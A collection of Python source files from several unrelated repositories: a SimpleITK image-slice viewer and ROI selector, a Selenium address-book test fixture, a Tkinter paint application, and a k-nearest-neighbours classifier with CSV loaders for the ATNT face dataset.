# Draw the image(s)
for ax, npa, title, min_intensity, max_intensity in zip(axes, npa_list, title_list, min_intensity_list, max_intensity_list):
ax.imshow(npa,
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
ax.set_title(title)
ax.set_axis_off()
fig.tight_layout()
class MultiImageDisplay(object):
def __init__(self, image_list, axis=0, shared_slider=False, title_list=None, window_level_list= None, figure_size=(10,8), horizontal=True):
self.get_window_level_numpy_array(image_list, window_level_list)
if title_list:
if len(image_list)!=len(title_list):
raise ValueError('Title list and image list lengths do not match')
self.title_list = list(title_list)
else:
self.title_list = ['']*len(image_list)
# Our dynamic slice, based on the axis the user specifies
self.slc = [slice(None)]*3
self.axis = axis
# Create a figure.
col_num, row_num = (len(image_list), 1) if horizontal else (1, len(image_list))
self.fig, self.axes = plt.subplots(row_num,col_num,figsize=figure_size)
if len(image_list)==1:
self.axes = [self.axes]
ui = self.create_ui(shared_slider)
        # Display the data and the controls. The first time we display the image is outside the "update_display" method,
        # as that method relies on the previous zoom factor which doesn't exist yet.
for ax, npa, slider, min_intensity, max_intensity in zip(self.axes, self.npa_list, self.slider_list, self.min_intensity_list, self.max_intensity_list):
self.slc[self.axis] = slice(slider.value, slider.value+1)
# Need to use squeeze to collapse degenerate dimension (e.g. RGB image size 124 124 1 3)
ax.imshow(np.squeeze(npa[self.slc]),
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
self.update_display()
display(ui)
def create_ui(self, shared_slider):
# Create the active UI components. Height and width are specified in 'em' units. This is
        # an HTML size specification, i.e., size relative to the current font size.
ui = None
if shared_slider:
# Validate that all the images have the same size along the axis which we scroll through
sz = self.npa_list[0].shape[self.axis]
for npa in self.npa_list:
if npa.shape[self.axis]!=sz:
raise ValueError('Not all images have the same size along the specified axis, cannot share slider.')
slider = widgets.IntSlider(description='image slice:',
min=0,
max=sz-1,
step=1,
value = int((sz-1)/2),
width='20em')
slider.observe(self.on_slice_slider_value_change, names='value')
self.slider_list = [slider]*len(self.npa_list)
ui = widgets.Box(padding=7, children=[slider])
else:
self.slider_list = []
for npa in self.npa_list:
slider = widgets.IntSlider(description='image slice:',
min=0,
max=npa.shape[self.axis]-1,
step=1,
value = int((npa.shape[self.axis]-1)/2),
width='20em')
slider.observe(self.on_slice_slider_value_change, names='value')
self.slider_list.append(slider)
ui = widgets.Box(padding=7, children=self.slider_list)
return ui
def get_window_level_numpy_array(self, image_list, window_level_list):
        # Using GetArrayFromImage and not GetArrayViewFromImage because we don't keep references
        # to the original images. If they were deleted outside this class the view would become
        # invalid, so we use a copy which guarantees that the GUI stays consistent.
self.npa_list = list(map(sitk.GetArrayFromImage, image_list))
if not window_level_list:
self.min_intensity_list = list(map(np.min, self.npa_list))
self.max_intensity_list = list(map(np.max, self.npa_list))
else:
self.min_intensity_list = list(map(lambda x: x[1]-x[0]/2.0, window_level_list))
self.max_intensity_list = list(map(lambda x: x[1]+x[0]/2.0, window_level_list))
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
# Draw the image(s)
for ax, npa, title, slider, min_intensity, max_intensity in zip(self.axes, self.npa_list, self.title_list, self.slider_list, self.min_intensity_list, self.max_intensity_list):
# We want to keep the zoom factor which was set prior to display, so we log it before
# clearing the axes.
xlim = ax.get_xlim()
ylim = ax.get_ylim()
self.slc[self.axis] = slice(slider.value, slider.value+1)
ax.clear()
# Need to use squeeze to collapse degenerate dimension (e.g. RGB image size 124 124 1 3)
ax.imshow(np.squeeze(npa[self.slc]),
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
ax.set_title(title)
ax.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
ax.set_xlim(xlim)
ax.set_ylim(ylim)
self.fig.canvas.draw_idle()
class ROIDataAquisition(object):
'''
This class provides a GUI for selecting box shaped Regions Of Interest (ROIs). Each ROI is represented as a
tuple: ((min_x,max_x),(min_y,max_y),(min_z,max_z)).
When using the zoom/pan tool from the toolbar ROI selection is disabled. Once you click again on the zoom/pan
button zooming/panning will be disabled and ROI selection is enabled.
Note that when you are marking the ROI on a slice that is outside the Z-range selected by the
range slider, once you are done selecting the ROI, you will see no change on the current slice. This is the
correct behavior, though initially you may be surprised by it.
'''
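    # Example (hypothetical values): an ROI spanning x in [10, 40], y in [25, 60] and z in [3, 7]
    # is represented as ((10, 40), (25, 60), (3, 7)).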
def __init__(self, image, window_level= None, figure_size=(10,8)):
self.image = image
self.npa, self.min_intensity, self.max_intensity = self.get_window_level_numpy_array(self.image, window_level)
self.rois = []
# ROI display settings
self.roi_display_properties = dict(facecolor='red', edgecolor='black', alpha=0.2, fill=True)
# Create a figure.
self.fig, self.axes = plt.subplots(1,1,figsize=figure_size)
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
self.roi_selector = RectangleSelector(self.axes, lambda eclick, erelease: None,
drawtype='box', useblit=True,
button=[1, 3], # Left, right buttons only.
minspanx=5, minspany=5, # Ignore motion smaller than 5 pixels.
spancoords='pixels',
interactive=True,
rectprops = self.roi_display_properties)
self.roi_selector.set_visible(False)
ui = self.create_ui()
        # Display the data and the controls. The first time we display the image is outside the "update_display" method,
        # as that method relies on the existence of a previous image which is removed from the figure.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.update_display()
display(ui)
def create_ui(self):
# Create the active UI components. Height and width are specified in 'em' units. This is
        # an HTML size specification, i.e., size relative to the current font size.
self.addroi_button = widgets.Button(description= 'Add ROI',
width= '7em',
height= '3em')
self.addroi_button.on_click(self.add_roi)
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.roi_range_slider = widgets.IntRangeSlider(description= 'ROI z range:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value=[0,self.npa.shape[0]-1],
width='20em')
self.slice_slider = widgets.IntSlider(description='image z slice:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value = int((self.npa.shape[0]-1)/2),
width='20em')
self.slice_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.slice_slider])
bx1 = widgets.Box(padding=7, children = [self.addroi_button])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
bx4 = widgets.Box(padding = 15, children = [self.roi_range_slider])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),widgets.VBox(children=[bx0,bx4])])
def on_slice_slider_value_change(self, change):
self.update_display()
def get_window_level_numpy_array(self, image, window_level):
npa = sitk.GetArrayViewFromImage(image)
# We don't take the minimum/maximum values, just in case there are outliers (top/bottom 2%)
if not window_level:
min_max = np.percentile(npa.flatten(), [2,98])
return npa, min_max[0], min_max[1]
else:
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
def update_display(self):
# Draw the image and ROIs.
# imshow adds an image to the axes, so we also remove the previous one.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.axes.images[0].remove()
# Iterate over all of the ROIs and only display/undisplay those that are relevant.
for roi_data in self.rois:
if self.slice_slider.value>= roi_data[3][0] and self.slice_slider.value<= roi_data[3][1]:
roi_data[0].set_visible(True)
else:
roi_data[0].set_visible(False)
self.axes.set_title('selected {0} ROIs'.format(len(self.rois)))
self.axes.set_axis_off()
self.fig.canvas.draw_idle()
def add_roi_data(self, roi_data):
'''
Add regions of interest to this GUI.
Input is an iterable containing tuples where each tuple contains
three tuples (min_x,max_x),(min_y,max_y), (min_z,max_z). The ROI
is the box defined by these integer values and includes
both min/max values.
'''
self.validate_rois(roi_data)
for roi in roi_data:
self.rois.append((patches.Rectangle((roi[0][0], roi[1][0]),
roi[0][1]-roi[0][0],
roi[1][1]-roi[1][0],
**self.roi_display_properties),
roi[0], roi[1], roi[2]))
self.axes.add_patch(self.rois[-1][0])
self.update_display()
def set_rois(self, roi_data):
'''
Clear any existing ROIs and set the display to the given ones.
Input is an iterable containing tuples where each tuple contains
three tuples (min_x,max_x),(min_y,max_y), (min_z,max_z). The ROI
is the box defined by these integer values and includes
both min/max values.
'''
self.clear_all_data()
self.add_roi_data(roi_data)
def validate_rois(self, roi_data):
for roi in roi_data:
# First element in each tuple is expected to be smaller or equal to the second element.
if roi[0][0]>roi[0][1] or roi[1][0]>roi[1][1] or roi[2][0]>roi[2][1]:
raise ValueError('First element in each tuple is expected to be smaller than second element, error in ROI (' + ', '.join(map(str,roi)) + ').')
# Note that SimpleITK uses x-y-z specification vs. numpy's z-y-x
            if roi[0][0]>=self.npa.shape[2] or roi[0][1]<0 or roi[1][0]>=self.npa.shape[1] or roi[1][1]<0 or roi[2][0]>=self.npa.shape[0] or roi[2][1]<0:
raise ValueError('Given ROI (' + ', '.join(map(str,roi)) + ') is outside the image bounds.')
def add_roi(self, button):
if self.roi_selector.visible:
self.roi_selector.set_visible(False)
# Extent is in sub-pixel coordinates, we need it in pixels/voxels.
roi_extent = [int(round(coord)) for coord in self.roi_selector.extents]
# We keep the patch for display and the x,y,z ranges of the ROI.
self.rois.append((patches.Rectangle((roi_extent[0], roi_extent[2]),
roi_extent[1]-roi_extent[0],
roi_extent[3]-roi_extent[2],
**self.roi_display_properties),
(roi_extent[0],roi_extent[1]),
(roi_extent[2],roi_extent[3]),
self.roi_range_slider.value))
self.axes.add_patch(self.rois[-1][0])
self.update_display()
def clear_all_data(self):
for roi_data in self.rois:
roi_data[0].remove()
del self.rois[:]
def clear_all(self, button):
self.clear_all_data()
self.update_display()
def clear_last(self, button):
if self.rois:
self.rois[-1][0].remove()
self.rois.pop()
self.update_display()
def get_rois(self):
'''
Return a list of tuples representing the ROIs. Each tuple contains three tuples (min_x,max_x),
(min_y,max_y), (min_z,max_z). The ROI is the box defined by these integer values and includes
both min/max values.
'''
return [(roi_data[1],roi_data[2],roi_data[3]) for roi_data in self.rois]
def __call__(self, event):
# This is dangerous as we are accessing a "private" variable to find the state
# of the figure's toolbar ('ZOOM',PAN' or None). When Zoom or pan are active we will
# ignore the button press, once the user deactivates the zoom/pan we can allow them
# to select the ROI.
# Discussion on stack overflow with matplotlib developer (circa 2013), no change to date:
# http://stackoverflow.com/questions/20711148/ignore-matplotlib-cursor-widget-when-toolbar-widget-selected
if self.fig.canvas.toolbar._active is None:
self.roi_selector.set_visible(True)
self.addroi_button.disabled = False
self.update_display()
```
|
{
"source": "Jenik-art/task1_1",
"score": 3
}
|
#### File: task1_1/fixture/contact.py
```python
import re
from selenium.webdriver.support.select import Select
from model.contact import Contact
import time
from model.group import Group
import random
from random import randrange
class contactHelper:
def __init__(self, app):
self.app = app
def add(self, contact):
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.contact_cache = None
def fill_contact_form(self, contact):
wd = self.app.wd
self.change_field_value("firstname",contact.firstname)
self.change_field_value("middlename",contact.middlename)
self.change_field_value("lastname",contact.lastname)
self.change_field_value("company",contact.company)
self.change_field_value("address",contact.address)
self.change_field_value("home", contact.homephone)
self.change_field_value("mobile", contact.mobilephone)
self.change_field_value("phone2", contact.secondaryphone)
self.change_field_value("work", contact.workphone)
self.change_field_value("email", contact.email)
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self,index):
wd = self.app.wd
self.choose_contact_by_index(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def choose_contact_by_index(self,index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def click_edit_by_index(self,index):
wd = self.app.wd
wd.find_elements_by_xpath("//table[@id='maintable']/tbody/tr/td[8]/a/img")[index].click()
def click_edit_by_id(self,id):
wd = self.app.wd
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def edit_first_contact(self):
self.edit_contact_by_index(0)
def edit_contact_by_index(self,index,contact):
wd = self.app.wd
self.click_edit_by_index(index)
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def edit_contact_by_id(self,id,contact):
wd = self.app.wd
self.click_edit_by_id(id)
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
wd.find_element_by_name(field_name).click()
def count(self):
wd = self.app.wd
self.app.open_home_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.app.open_home_page()
self.contact_cache =[]
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
f_name = cells[2].text
l_name = cells[1].text
address= cells[3].text
all_emails=cells[4].text
id = cells[0].find_element_by_tag_name("input").get_attribute("id")
all_phones= cells[5].text
self.contact_cache.append(Contact(lastname=l_name,firstname = f_name, id=id, address=address,
all_emails_from_home_page=all_emails, all_phones_from_home_page=all_phones))
return list(self.contact_cache)
def get_contact_info_from_edit_page(self,index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
address = wd.find_element_by_name("address").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
homephone = wd.find_element_by_name("home").get_attribute("value")
workphone = wd.find_element_by_name("work").get_attribute("value")
mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
secondaryphone = wd.find_element_by_name("phone2").get_attribute("value")
return Contact(lastname=lastname,firstname = firstname, id=id, address=address,email=email, email2=email2, email3=email3, homephone=homephone,workphone=workphone,
mobilephone=mobilephone, secondaryphone= secondaryphone)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
secondaryphone = re.search("P: (.*)", text).group(1)
memberof = re.search("Member of: (.*)", text).group(1)
return Contact(homephone=homephone, workphone=workphone,
mobilephone=mobilephone, secondaryphone=secondaryphone, memberof=memberof)
def open_contact_to_edit_by_index(self,index):
wd = self.app.wd
self.app.open_home_page()
element = wd.find_elements_by_name("entry")[index]
cell = element.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self,index):
wd = self.app.wd
self.app.open_home_page()
element = wd.find_elements_by_name("entry")[index]
cell = element.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def delete_contact_by_id(self, id):
wd = self.app.wd
self.choose_contact_by_id(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
time.sleep(1)
wd.switch_to_alert().accept()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def choose_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def add_contact_to_group(self,index,id):
wd = self.app.wd
self.app.open_home_page()
self.choose_contact_by_index(index)
self.choose_group_for_contact(id)
wd.find_element_by_name("add").click()
def choose_group_for_contact(self,id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='to_group']"))
select.select_by_value('%s' % id)
def choose_group_with_contact(self, id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='group']"))
select.select_by_value('%s' % id)
contacts_in_group = self.get_contact_list()
        if not contacts_in_group:
            # The group is empty, so add a randomly chosen contact from the full contact list to it.
            index = randrange(self.count())
            self.add_contact_to_group(index, id)
def delete_contact_from_group(self, index):
wd = self.app.wd
self.choose_contact_by_index(index)
wd.find_element_by_name("remove").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def open_group_with_contact_page(self,id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='group']"))
select.select_by_value('%s' % id)
def get_contact_list_from_group_page(self):
if self.contact_cache is None:
wd = self.app.wd
self.contact_cache =[]
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
f_name = cells[2].text
l_name = cells[1].text
address= cells[3].text
all_emails=cells[4].text
id = cells[0].find_element_by_tag_name("input").get_attribute("id")
all_phones= cells[5].text
self.contact_cache.append(Contact(lastname=l_name,firstname = f_name, id=id, address=address,
all_emails_from_home_page=all_emails, all_phones_from_home_page=all_phones))
return list(self.contact_cache)
```
|
{
"source": "jenilchudgar/PaintApp",
"score": 4
}
|
#### File: jenilchudgar/PaintApp/main.py
```python
from tkinter import *
from tkinter import colorchooser,filedialog,messagebox
from PIL import ImageGrab,ImageTk,Image
import tkinter.ttk as ttk
import os
root = Tk()
root.title("Paint App")
root.iconbitmap("icon.ico")
root.geometry("1000x700")
# Brush Color
brush_color = "black"
# Saved = False
saved = False
# Change Color
def change_color(color):
global brush_color
brush_color = color
# Change the size of the brush
def change_brush_size(e):
brush_slider_label.config(text=str(int(brush_slider.get())))
# Draw on the canvas
def draw(e):
    # e is the <B1-Motion> mouse event; it provides the current cursor coordinates.
# Brush Parameters
brush_width = int(brush_slider.get())
# Brush Types: BUTT, ROUND, PROJECTING
brush_type = brush_style_type.get()
# Starting Position
x1 = e.x - 1
y1 = e.y - 1
# Ending Position
x2 = e.x + 1
y2 = e.y + 1
# Draw The Line
canvas.create_line(x1,y1,x2,y2,fill=brush_color,smooth=True,width=brush_width,capstyle=brush_type)
# Change Brush Color
def change_brush_color(event=None):
global brush_color
brush_color = "black"
brush_color = colorchooser.askcolor(color=brush_color)[1]
# Change Canvas Color
def change_canvas_color():
global canvas_background_color
canvas_background_color = "black"
canvas_background_color = colorchooser.askcolor(color=canvas_background_color)[1]
canvas.config(bg=canvas_background_color)
# Clear Canvas
def clear_canvas(event=None):
canvas.config(bg="white")
canvas.delete(ALL)
# Save image to PNG
def save_to_png(event=None):
file_path = filedialog.asksaveasfilename(initialdir=os.curdir,filetypes=(
("PNG Files","*.png"),
("All Files","*.*"),
))
if not file_path.endswith(".png"):
file_path += ".png"
if file_path:
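        # NOTE: the 1.25 factor below assumes a 125% Windows display-scaling setting; with a
        # different scaling factor the grabbed region will not line up with the canvas.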
x=(root.winfo_rootx()*1.25+canvas.winfo_x()*1.25)
y=(root.winfo_rooty()*1.25+canvas.winfo_y()*1.25)
x1=x+canvas.winfo_width()*1.25
y1=y+canvas.winfo_height()*1.25
ImageGrab.grab().crop((x,y,x1,y1)).save(file_path)
# Pop up message box
messagebox.showinfo("Image Saved!","Your Image has been saved successfully.")
global saved
saved = True
# Create New File
def new_file():
if saved:
clear_canvas()
else:
ok = messagebox.askyesno("File Not Saved!","The file on which you are working is not saved, if you continue all progress will be lost.\nDo you want to continue?")
if ok:
clear_canvas()
# Open a file
def open_file():
global img
path = filedialog.askopenfilename(filetypes=[("PNG Files","*.png")])
if path:
img = ImageTk.PhotoImage(Image.open(path))
canvas.create_image(20, 20, anchor=NW, image=img)
# Help
def about():
top = Toplevel(root)
top.geometry("600x300")
top.iconbitmap("about.ico")
Label(top,text="Paint App: About",font=('Calibri',18)).pack(anchor=CENTER)
Label(top,text="This app has been created by Jenil in the udemy course by '<NAME>'.\nI have made this app using Python and Tkinter.",font=("Calbiri",12)).pack()
global img
img = ImageTk.PhotoImage(Image.open("python.png"))
Label(top,image=img).pack()
canvas.pack()
# Key Board Shortcuts
def help_keyboard_shortcuts():
top = Toplevel(root)
top.geometry("400x400")
top.iconbitmap("keyboard.ico")
Label(top,text="Paint App: Key Board Shortcuts",font=('Calibri',18)).pack(anchor=CENTER)
Label(top,text="e: Erase\nh: Change Color\nc: Clear Canvas\nShift + R: Chnage Brush Type To Round\nShift + S: Chnage Brush Type To Slash\nShift + D: Chnage Brush Type To Diamond\nCtrl + N: New File\nCtrl + O Open File\nCtrl + S: Save File",font=("Calbiri",14)).pack()
# Eraser
def eraser(event=None):
global brush_color
brush_color = "white"
# Create Menu Bar
menu = Menu(root)
root.config(menu=menu)
# Create a file menu item
file_menu = Menu(menu)
file_menu.add_command(label="New File",command=new_file)
file_menu.add_command(label="Open File",command=open_file)
file_menu.add_command(label="Save",command=save_to_png)
file_menu.add_separator()
file_menu.add_command(label="Exit",command=root.quit)
menu.add_cascade(label="File",menu=file_menu)
# Create a help menu item
help_menu = Menu(menu)
help_menu.add_command(label="About",command=about)
help_menu.add_command(label="Key Board Shrtcuts",command=help_keyboard_shortcuts)
menu.add_cascade(label="Help",menu=help_menu)
# Width and Height
w = 600
h = 400
# Create Canvas
canvas = Canvas(root,width=w,height=h,bg="white")
canvas.bind("<B1-Motion>",draw)
canvas.pack(pady=20)
# Create Brush Options Frames
brush_options_frame = Frame(root)
brush_options_frame.pack(pady=10)
# Brush Size : Brush Options
brush_size_frame = LabelFrame(brush_options_frame,text="Brush Size")
brush_size_frame.grid(row=0,column=0,padx=30)
# Brush Slider
brush_slider = ttk.Scale(brush_size_frame,from_ = 100,to = 1,orient=VERTICAL,value=20,command=change_brush_size)
brush_slider.pack(pady=10,padx=10)
# Brush Slider Label
brush_slider_label = Label(brush_size_frame,text=brush_slider.get())
brush_slider_label.pack()
# Brush Type : Brush Options
brush_type_frame = LabelFrame(brush_options_frame,text="Brush Type")
brush_type_frame.grid(row=0,column=1,padx=30)
# Create Tkinter String Variable to store Brush Type
brush_style_type = StringVar()
brush_style_type.set(ROUND)
# Create Radio Buttons
brush_type_radio_btn_1 = Radiobutton(brush_type_frame,text="Round",variable=brush_style_type,value=ROUND)
brush_type_radio_btn_1.pack(anchor=W)
brush_type_radio_btn_2 = Radiobutton(brush_type_frame,text="Slash",variable=brush_style_type,value=BUTT)
brush_type_radio_btn_2.pack(anchor=W)
brush_type_radio_btn_3 = Radiobutton(brush_type_frame,text="Diamond",variable=brush_style_type,value=PROJECTING)
brush_type_radio_btn_3.pack(anchor=W)
# Change Colors
change_color_frame = LabelFrame(brush_options_frame,text="Change Colors")
change_color_frame.grid(row=0,column=2,padx=30)
# Change Brush Color Button
change_brush_color_btn = Button(change_color_frame,text="Brush Color",command=change_brush_color)
change_brush_color_btn.pack(pady=10,padx=10)
# Change Canvas Color Button
change_canvas_color = Button(change_color_frame,text="Canvas Color",command=change_canvas_color)
change_canvas_color.pack(pady=10,padx=10)
# Program Options Frame
options_frame = LabelFrame(brush_options_frame,text="Options")
options_frame.grid(row=0,column=3,padx=30)
# Clear Button
clear_btn = Button(options_frame,text="Clear Canvas",command=clear_canvas)
clear_btn.pack(padx=10,pady=10)
# Save Button
save_to_png_btn = Button(options_frame,text="Save to PNG",command=save_to_png)
save_to_png_btn.pack(padx=10,pady=10)
# Eraser
eraser_btn = Button(options_frame,text="Eraser Tool",command=eraser)
eraser_btn.pack(padx=10,pady=10)
# Change Colors
pen_colors_frame = LabelFrame(brush_options_frame,text="Pen Colors")
pen_colors_frame.grid(row=0,column=4,padx=30)
# Black
black_color_btn = Button(pen_colors_frame,bg="black",command=lambda: change_color("black"))
black_color_btn.grid(row=0,column=0,padx=5,pady=5)
# White
white_color_btn = Button(pen_colors_frame,bg="white",command=lambda: change_color("white"))
white_color_btn.grid(row=1,column=0,padx=5,pady=5)
# Red
red_color_btn = Button(pen_colors_frame,bg="red",command=lambda: change_color("red"))
red_color_btn.grid(row=0,column=1,padx=5,pady=5)
# Pink
pink_color_btn = Button(pen_colors_frame,bg="Pink",command=lambda: change_color("Pink"))
pink_color_btn.grid(row=1,column=1,padx=5,pady=5)
# Blue
blue_color_btn = Button(pen_colors_frame,bg="blue",command=lambda: change_color("blue"))
blue_color_btn.grid(row=0,column=2,padx=5,pady=5)
# Light Blue
light_blue_color_btn = Button(pen_colors_frame,bg="light blue",command=lambda: change_color("light blue"))
light_blue_color_btn.grid(row=1,column=2,padx=5,pady=5)
# Orange
orange_color_btn = Button(pen_colors_frame,bg="orange",command=lambda: change_color("orange"))
orange_color_btn.grid(row=0,column=5,padx=5,pady=5)
# Yellow
yellow_color_btn = Button(pen_colors_frame,bg="yellow",command=lambda: change_color("yellow"))
yellow_color_btn.grid(row=1,column=5,padx=5,pady=5)
# Green
green_color_btn = Button(pen_colors_frame,bg="green",command=lambda: change_color("green"))
green_color_btn.grid(row=0,column=4,padx=5,pady=5)
# Light green
light_green_color_btn = Button(pen_colors_frame,bg="light green",command=lambda: change_color("light green"))
light_green_color_btn.grid(row=1,column=4,padx=5,pady=5)
# Keyboard Shortcuts
root.bind("<e>",eraser)
root.bind("<h>",change_brush_color)
root.bind("<c>",clear_canvas)
root.bind("<Shift_L><R>",lambda e: brush_style_type.set(ROUND))
root.bind("<Shift_L><S>",lambda e: brush_style_type.set(BUTT))
root.bind("<Shift_L><D>",lambda e: brush_style_type.set(PROJECTING))
root.bind("<Control_L><s>",lambda e: save_to_png())
root.bind("<Control_L><n>",lambda e: new_file())
root.bind("<Control_L><o>",lambda e: open_file())
root.bind("<F1>",lambda e: about())
root.bind("<F2>",lambda e: help_keyboard_shortcuts())
root.mainloop()
# -<NAME>
```
|
{
"source": "jenildesai25/ATNT50",
"score": 3
}
|
#### File: ATNT50/ATNT50/Knn.py
```python
import ReadData
from scipy.spatial import distance
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import KFold
import Task_E
class Knn:
def __init__(self, k):
self.k = k
def load_train_test_data(self, train_data, test_data):
"""
        :param train_data: raw training data file the algorithm is fitted on, so the result can be used against the test data.
        :param test_data: raw test data file used to check the predictions and compute the accuracy.
        :return: well-formed train and test data, with one image per row and the image's label as the index.
"""
try:
# next line will give you transposed and well formatted train data.
train_data = ReadData.load_data(train_data)
# next line will give you transposed and well formatted test data.
test_data = ReadData.load_test_data(test_data)
return train_data, test_data
except Exception as e:
print(e)
def calculate_distance(self, train_data, test_data):
"""
:param train_data: formatted train data that we get from load_train_test_data function.
:param test_data: formatted test data that we get from load_train_test_data function.
:return: dictionary with having key as test data index i.e in our case ['1','4','5','3','2']. be careful keys are in string.
and values are sorted euclidean distance with label from train data.
container = {'1':[(1111,1),(131241,3),...]}
'1' is the key from test data and (1111) is the distance between 1st instance of train data with 1st data instance from test data.
1 is the label of train data.
"""
result_list = list()
for test_data_instance in test_data:
result_dict = dict()
# print('test_data_instance',test_data_instance)
nearest_neighbors = self.get_nearest_neighbors(train_data, test_data_instance)
# print('nearest_neighbors',nearest_neighbors)
calculated_classification = self.get_classification(nearest_neighbors)
result_dict['Test Label'] = test_data_instance[0]
result_dict['Neighbors Label'] = nearest_neighbors
result_dict['Classification'] = calculated_classification
result_list.append(result_dict) # Given Classification, Calculated Classification
# Calculate Accuracy
return result_list
def get_nearest_neighbors(self, training_data, testing_data):
try:
distances = []
            for training_instance in training_data:
                euclidean_dist = distance.euclidean(training_instance[1:], testing_data[1:])
                distances.append((euclidean_dist, training_instance[0]))
# Sort by distances
sorted_distances = sorted(distances, key=lambda x: x[0])
return [distance_data[1] for distance_data in sorted_distances[:self.k]]
except Exception as e:
print(e)
def get_classification(self, nearest_neighbour):
""" Returns label
"""
class_votes = dict()
for label in nearest_neighbour:
vote = class_votes.get(label, 0)
class_votes[label] = vote + 1
sorted_votes = sorted(
list(class_votes.items()), key=lambda x: x[1], reverse=True)
return sorted_votes[0][0]
def get_accuracy(self, prediction_n_test):
correct = 0
for prediction, test in prediction_n_test:
if prediction == test:
correct += 1
return (float(correct) / float(len(prediction_n_test))) * 100.0
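

# Minimal usage sketch (hypothetical file names; assumes the column-per-image layout handled by ReadData):
# knn = Knn(k=3)
# train_df, test_df = knn.load_train_test_data('trainDataXY.txt', 'testDataXY.txt')
# results = knn.calculate_distance(train_df.values, test_df.values)
# accuracy = knn.get_accuracy([(r['Classification'], r['Test Label']) for r in results])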
```
#### File: ATNT50/ATNT50/ReadData.py
```python
import pandas as pd
import sys
def load_data(file_name):
# read_csv file and return data frame.
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
return load_file
def load_test_data(file_name):
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
return load_file
def data_handler(file_name):
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
train_data = load_file[:30]
test_data = load_file[30:39]
return train_data, test_data
# Renamed from load_data to avoid shadowing the single-argument load_data defined above.
def load_data_with_labels(file, algo):
load_file = pd.read_csv(file, sep=',', header=None)
labels = load_file.iloc[0]
# print(labels)
N_instance = labels.size
# print(N_instance)
data = load_file.iloc[1:]
if algo == "LG":
return N_instance, labels, data
elif algo == "SVM":
return labels.transpose(), data.transpose()
# if __name__ == '__main__':
# # if file is in the same directory where path is just put file name.
# # if reading file using terminal uncomment next line and pass file_path
# # file_path = sys.argv[2]
# # load_data('trainDataXY.txt')
# load_data('C:/Users/jenil/OneDrive - University of Texas at Arlington/UTA/sem 3/CSE 5334/Project1/ATNT50/trainDataXY.txt')
```
|
{
"source": "jenildesai25/k_means_implementation",
"score": 3
}
|
